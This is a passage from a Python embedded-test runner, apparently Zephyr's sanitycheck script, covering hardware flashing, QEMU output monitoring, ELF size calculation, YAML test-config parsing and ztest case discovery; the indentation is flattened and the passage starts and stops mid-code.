# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash != []:
command.append('--')
command.extend(self.suite.west_flash.split(','))
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None)
if runner:
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command.append("--runner")
command.append(hardware.get('runner', None))
if runner == "pyocd":
command.append("--board-id")
command.append(board_id)
elif runner == "nrfjprog":
command.append('--')
command.append("--snr")
command.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command.append('--')
command.append("--cmd-pre-init")
command.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command.append('--')
command.append("--cmd-pre-init")
command.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
serial_device = hardware['serial']
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time; it is
maintained by counting guest instructions, so we use the QEMU
process execution time to approximate the time of the guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
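# In other words, "guest time" is approximated as the CPU seconds (user + system)
# consumed by the QEMU process itself; _thread() below compares this against the
# configured timeout before deciding that the run has really timed out.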
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering; we don't want read() or poll() to
# ever block if there is data in there.
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
if pid and this_timeout > 0:
# It's possible we polled nothing because the host did not
# schedule the QEMU process enough CPU time during
# p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug("QEMU: %s" % line)
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state != 'failed':
out_state = harness.state
# If we get some state, that means the test is doing well; we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled, since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug("QEMU complete (%s) after %f seconds" %
(out_state, handler_time))
handler.set_state(out_state, handler_time)
if out_state == "timeout":
handler.instance.reason = "Timeout"
elif out_state == "failed":
handler.instance.reason = "Failed"
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# Sometimes QEMU can't handle the SIGTERM signal correctly;
# in that case, kill the QEMU process directly (SIGKILL) and let
# sanitycheck judge the test result from the console output.
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
self.returncode = 0
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
self.returncode = proc.returncode
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
if self.returncode != 0:
self.set_state("failed", 0)
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_area",
"_k_timer_area",
"_k_mem_slab_area",
"_k_mem_pool_area",
"sw_isr_table",
"_k_sem_area",
"_k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"_k_stack_area",
"_k_msgq_area",
"_k_mbox_area",
"_k_pipe_area",
"net_if",
"net_if_dev",
"net_l2_data",
"_k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache"
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"object_access",
"rodata",
"devconfig",
"net_l2",
"vector",
"sw_isr_table",
"_settings_handlers_area",
"_bt_channels_area",
"_bt_br_channels_area",
"_bt_services_area",
"vectors",
"net_socket_register",
"net_ppp_proto"
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise SanityRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP cannot be used, as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise SanityRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class SanityConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new SanityConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
                    whitespace (but keep the elements as strings). Finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k not in valid_keys:
raise ConfigurationError(
self.filename,
"Unknown config key '%s' in definition for '%s'" %
(k, name))
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
                    # but some keys are handled in an ad hoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
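# Illustrative use of SanityConfigParser (a sketch; the file name, schema and
# key definitions below are hypothetical):
#
#   parser = SanityConfigParser("testcase.yaml", schema)
#   parser.load()
#   valid_keys = {
#       "tags":    {"type": "set", "required": False},
#       "timeout": {"type": "int", "default": 60},
#   }
#   cfg = parser.get_test("sample.basic", valid_keys)
#   # cfg now holds the merged "common" + per-test values, with type
#   # conversion applied and defaults filled in for missing keys.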
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.sanitycheck = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = SanityConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.sanitycheck = data.get("sanitycheck", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_whitelist = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_whitelist = None
self.toolchain_exclude = None
self.toolchain_whitelist = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise SanityCheckException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
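    # Example of how get_unique() composes a name (hypothetical paths): for a
    # testcase_root of "<ZEPHYR_BASE>/tests/kernel", a workdir of "sched/basic"
    # and a test name of "kernel.sched.basic", the unique name becomes
    # "tests/kernel/sched/basic/kernel.sched.basic". A name without a '.'
    # separator (e.g. "basic") raises SanityCheckException.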
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
            # Consume the argument that becomes the extra testcase
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
# contextlib makes pylint think main_c isn't subscriptable
# pylint: disable=unsubscriptable-object
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
                    # can't find ztest_test_suite; this file may just be a
                    # client that includes ztest.h without defining a suite
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join({match.decode() for match in achtung_matches})
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "") for match in _matches]
return matches, warnings
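    # Illustrative input for scan_file() (hypothetical C snippet). Given a
    # source file containing:
    #
    #   ztest_test_suite(mutex_complex,
    #           ztest_unit_test(test_mutex_lock),
    #           ztest_user_unit_test(test_mutex_unlock));
    #   ztest_run_test_suite(mutex_complex);
    #
    # scan_file() would return (["mutex_lock", "mutex_unlock"], None): the
    # "test_" prefix is stripped and no warning is raised because every case
    # name starts with "test_".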
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise SanityRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
        # On Windows we currently only support building; running the tests
        # there is still work in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
        self.build_only = _build_only or not runnable
self.run = not self.build_only
return
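    # Illustrative outcomes of check_build_or_run() (sketch; the objects are
    # hypothetical):
    #
    #   inst = TestInstance(tc, plat, "outdir")
    #   inst.check_build_or_run(build_only=False, enable_slow=False)
    #   # - qemu-simulated platform, plain ztest harness:
    #   #     inst.build_only == False, inst.run == True
    #   # - tc.slow is True while enable_slow is False:
    #   #     inst.build_only == True,  inst.run == False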
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
return content
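    # Example of the generated sanitycheck/testcase_extra.conf contents
    # (sketch; assumes a native platform with coverage and ASAN enabled, and a
    # hypothetical CONFIG_FOO coming from testcase.extra_configs):
    #
    #   CONFIG_FOO=y
    #   CONFIG_COVERAGE=y
    #   CONFIG_COVERAGE_DUMP=y
    #   CONFIG_ASAN=y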
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
